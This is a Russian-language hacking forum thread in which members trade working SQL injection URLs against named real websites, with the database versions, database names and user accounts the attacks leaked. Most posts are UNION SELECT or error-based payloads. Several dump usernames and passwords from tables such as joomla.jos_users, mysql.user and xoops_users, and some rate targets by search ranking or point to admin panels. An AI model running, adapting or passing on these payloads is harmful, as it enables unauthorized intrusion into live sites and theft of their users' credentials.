SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. tracy

    tracy Elder - Старейшина

    Joined:
    24 Mar 2009
    Messages:
    244
    Likes Received:
    119
    Reputations:
    40
    http://www.pogoda.v.ua/index.php?id=13+and+1=0+union+select+1,version(),3,4,5+--+
    ТИЦ : 10

    http://www.rfn.spb.ru/index.php?cat=contacts&page=branch&branch=3+UnIon+selECt+1,2,version(),4,5,6,7,8,9,10,11,12,13,14+--+
    ТИЦ : 110 PR: 3

    http://www.volga-rm.ru/catalogue/?catalogue&group=00000002202+union+select+1,2,3,group_concat(table_name),5,6,7,8,9+from+information_schema.tables+where+table_schema=0x623132333035--+
    ТИЦ : 10
     
  2. Terminolog

    Terminolog New Member

    Joined:
    15 May 2010
    Messages:
    0
    Likes Received:
    2
    Reputations:
    0
    Code:
    http://www.kinoglaz.fr/u_fiche_film.php?num=2010-999.9+union+select+1,2,3,4,5--
    ТИЦ 60
    PR 4

    Code:
    http://www.bloody-disgusting.com/platinumdunes/entry.php?id=9-999.9+union+select+1,2,3,4,5,6--
    ТИЦ 100
    PR 5
     
    #12902 Terminolog, 5 Sep 2010
    Last edited by a moderator: 5 Sep 2010
  3. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,148
    Reputations:
    886
    http://www.modularsquare.com/products.php?prod=-158+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
     
    _________________________
  4. daniel_1024

    daniel_1024 Elder - Старейшина

    Joined:
    15 Jul 2009
    Messages:
    260
    Likes Received:
    227
    Reputations:
    386
    шоп:
    Code:
    http://www.chemicalshop.biz/view.php?id=4509+and+1=0+union+select+0,1,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19
    Version: 4.0.27-max-log
    Database: db122374831
    User: [email protected]

    Code:
    http://ovp.site50.net/ovp/gallery.php?id=55809+and+1=0+union+select+0,1,2,3,version(),5,6,7,8,9,10,11,12
    Version: 5.0.91-community
    Database: a6123114_ovp2
    User: [email protected]

    Code:
    http://www.smachno.biz/index.php?id=25509+and+1=0+union+select+0,1,2,3,4,5,6,7,version(),9,10
    Version: 5.1.42
    Database: smachno_smachno
    User: smachno_smachno@localhost

    Code:
    http://www.bystock.biz/index.php?id=2409+and+1=0+union+select+0,version(),2,3,4,5,6
    Version: 5.0.89-community
    Database: vulkan_stock
    User: vulkan_stock@localhost
     
    #12904 daniel_1024, 5 Sep 2010
    Last edited: 5 Sep 2010
    2 people like this.
  5. intNet

    intNet Member

    Joined:
    31 May 2009
    Messages:
    29
    Likes Received:
    14
    Reputations:
    5
    PR4
    Code:
    http://www.tierra-inca.com/album/photos/view.php?lg=it&id=4509+and+1=0+union+select+1,2,3,4,5,6,7,8,9,version(),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39+--+
    Code:
    http://vision-egy.net/products.php?id=6+and+1=0+union+select+1,version(),3
     
    #12905 intNet, 5 Sep 2010
    Last edited: 5 Sep 2010
  6. tracy

    tracy Elder - Старейшина

    Joined:
    24 Mar 2009
    Messages:
    244
    Likes Received:
    119
    Reputations:
    40
    http://www.rotary7040.com/clubsite.php?id=4586+and+1=0+UnIon+selECt+1,2,group_concat(,user(),version()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45--+
    PR: 4

    http://www.kkfi.org/program.php?id=63+group+by+24+--+
     
  7. daniel_1024

    daniel_1024 Elder - Старейшина

    Joined:
    15 Jul 2009
    Messages:
    260
    Likes Received:
    227
    Reputations:
    386
    BENCHMARK

    psa.org.au
    Version: 5.0.32-Debian_7etch10-log
    Database: psa_www
    User: psa_www_ro@localhost


    выводим все таблицы:
    затем колонки:
    и дампим данные:
    всё, 1300 страница))
     
    #12907 daniel_1024, 5 Sep 2010
    Last edited: 5 Sep 2010
    4 people like this.
  8. intNet

    intNet Member

    Joined:
    31 May 2009
    Messages:
    29
    Likes Received:
    14
    Reputations:
    5
    Version(): 5.0.82sp1
    Database(): mindsmack
    User(): bg_mindsmack

    Code:
    http://www.ortega.com/products/products.php?id=6+and+1=0+union+select+1,2,3,4,5,group_concat(table_name),7,8,9,10+from+information_schema.tables+--+
    PR5
     
  9. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,148
    Reputations:
    886
    http://www.wptgroup.com/products.php?id=4+union+select+1,2,3,4,5,6,7,8,9+from+msysaccessobjects
     
    _________________________
  10. Kusto

    Kusto Elder - Старейшина

    Joined:
    4 Feb 2007
    Messages:
    886
    Likes Received:
    678
    Reputations:
    510
    http://www.riddim.de/new.php?id=-330+union+select+1,2,3,4,concat(username,char(58),password),6,7,8,9,10,11,12,13,14,15,16,17,18+from+joomla.jos_users+--+


    http://nakano.no-ip.org/lege/diary-new.php?id=-2138+union+select+1,2,3,4,5,6,concat(user,char(58),password),8,9+from+mysql.user+--+
     
    #12910 Kusto, 5 Sep 2010
    Last edited: 5 Sep 2010
  11. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,148
    Reputations:
    886
    http://www.lourdesdirect.net/products.php?currency=12'+or+(1,1)=(select+count(0),concat((select+version()+from+information_schema.tables+limit+0,1),floor(rand(0)*2))from(information_schema.tables)+group+by+2)--+
     
    _________________________
  12. stepashka_

    stepashka_ Мотоциклист

    Joined:
    9 Nov 2009
    Messages:
    1,022
    Likes Received:
    423
    Reputations:
    234
    Code:
    [COLOR=White]http://doska.k-gb.ru/ind.php?pn=5&id_typ=-137+union+select+1,2,3,4,5,6,group_concat(column_name),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=0x75736572+--+[/COLOR]
    тиц 120
    PageRan 3
     
  13. Lilo

    Lilo Banned

    Joined:
    10 Mar 2009
    Messages:
    462
    Likes Received:
    784
    Reputations:
    313
    PHP:
    http://weloveyourface.com/face.php?id=-26+union+select+1,2,3,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),5,6,7--
    пассы в открытом виде
     
    #12913 Lilo, 6 Sep 2010
    Last edited: 6 Sep 2010
    1 person likes this.
  14. HakaR

    HakaR Active Member

    Joined:
    23 Jul 2009
    Messages:
    301
    Likes Received:
    200
    Reputations:
    3
    PHP:
    http://velosipedov.net/html/modules/articles/print.php?id=-2+union+select+1,2,3,4,concat_ws(0x3a,uname,pass,rank),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+cars_users+limit+0,1--
    ТИЦ30 PR2
    PHP:
    http://www.somosportugueses.com/modules/articles/print.php?id=-81+union+select+1,2,3,4,concat_ws(0x3a,uname,pass,rank),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+xoops_users+limit+0,1--
    PR4
     
  15. av1

    av1 Elder - Старейшина

    Joined:
    6 Oct 2008
    Messages:
    720
    Likes Received:
    104
    Reputations:
    58
    Code:
    http://www.atmo.arizona.edu/?section=news&id=detail&newsID=-131+UNION+SELECT+1,2,concat_ws%280x3a,user%28%29,version%28%29,database%28%29%29,4,5,6--
    Username: webuser@localhost
    Version: 5.0.77
    Database: atmo

    Google PR: 7
     
  16. tracy

    tracy Elder - Старейшина

    Joined:
    24 Mar 2009
    Messages:
    244
    Likes Received:
    119
    Reputations:
    40
    http://www.nevskiplastex.ru/catalog/?id_sect=-102+union+select+1,2,3,4,group_concat(table_name),6+from+information_schema.tables+where+table_schema=0x6e6576736b695f6e6576--+
    ТИЦ : 60

    http://www.1-radio.ru/?app=&file=aticles&do=one&id=60+and+1=0+union+select+1,2,version(),4,5,6+--+
    ТИЦ : 40

    http://www.toolsclub.ru/index.php?catID=-17+union+select+1--

    http://www.antikor-s.ru/?id=-53+union+select+1,2,3,4,5,6,7+--+
    ТИЦ : 10

    http://www.imola.ru/?menu_id=177&page_id=28+and+1=0+union+select+1,2,3,4,5,6,7,8--+
    ТИЦ : 50

    http://www.speedsound.ru/forum.php?action=display_tread&tread_id=9+and+1=0+union+select+version()+--+
    ТИЦ : 10


    http://www.kyzmet.kz/?lang=ru&id_1=15+and+1=0+union+select+1,2,version(),4,5,6,7,8,9,10
    Агентство Республики Казахстан по делам государственной службы
    Выводил benchmark'om через скрипт от daniel_1024 :)
    ТИЦ : 170 PR: 6
     
    #12916 tracy, 6 Sep 2010
    Last edited by a moderator: 6 Sep 2010
    1 person likes this.
  17. stepashka_

    stepashka_ Мотоциклист

    Joined:
    9 Nov 2009
    Messages:
    1,022
    Likes Received:
    423
    Reputations:
    234
    Code:
    [COLOR=White]http://www.fazendeiro.ru/board/ind.php?pn=2&id_categ=-40+union+select+1,2,3,4,5,group_concat(column_name),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=0x70687062625f7573657273+--+[/COLOR]
    тиц 50

    Code:
    [COLOR=White]http://www.glavmetall.ru/board2/ind.php?pn=0&id_typ=-18+union+select+1,2,3,4,5,6,concat_ws(0x3a,version(),database(),user()),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23--+[/COLOR]
    4.1.25-log:wwwglavmetallru:glavmeta@localhost
    тиц 10
    PageRank 1
     
    #12917 stepashka_, 6 Sep 2010
    Last edited: 6 Sep 2010
  18. HakaR

    HakaR Active Member

    Joined:
    23 Jul 2009
    Messages:
    301
    Likes Received:
    200
    Reputations:
    3
    PHP:
    http://www.diver.ru/clubs.php?id=-117+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9,10,11--
    5.0.77:diver:[email protected]
    ТИЦ300 PR5
    PHP:
    http://profistar.ru/club.php?id=-4+union+select+1,2,concat_ws(0x3a,id,login,pass),4,5+from+users+limit+0,1--
    http://profistar.ru/admin
     
    #12918 HakaR, 6 Sep 2010
    Last edited: 6 Sep 2010
  19. stepashka_

    stepashka_ Мотоциклист

    Joined:
    9 Nov 2009
    Messages:
    1,022
    Likes Received:
    423
    Reputations:
    234
    Code:
    [COLOR=White]http://www.elecab.ru/board/ind.php?pn=6&id_categ=-41+union+select+1,2,3,4,5,concat_ws(0x3a,version(),database(),user()),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--+[/COLOR]
    4.1.25-log:elecab43_elecab:elecab43_userel@localhost
    тиц 20
    PageRank 2
     
  20. -PRIVAT-

    -PRIVAT- Banned

    Joined:
    17 Apr 2010
    Messages:
    245
    Likes Received:
    139
    Reputations:
    87

    [​IMG]
     
    #12920 -PRIVAT-, 6 Sep 2010
    Last edited: 9 Sep 2010
    3 people like this.
Thread Status:
Not open for further replies.